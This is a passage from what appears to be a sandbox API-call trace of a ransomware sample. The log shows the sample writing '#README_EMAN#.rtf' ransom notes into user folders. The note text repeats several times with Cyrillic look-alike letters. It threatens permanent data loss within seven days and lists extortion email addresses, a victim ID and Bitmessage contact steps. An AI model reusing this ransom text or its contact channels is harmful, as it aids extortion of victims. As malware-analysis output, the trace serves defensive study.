ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.353] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.354] CloseHandle (hObject=0x294) returned 1 [0273.354] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0273.354] GetLastError () returned 0x2 [0273.354] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 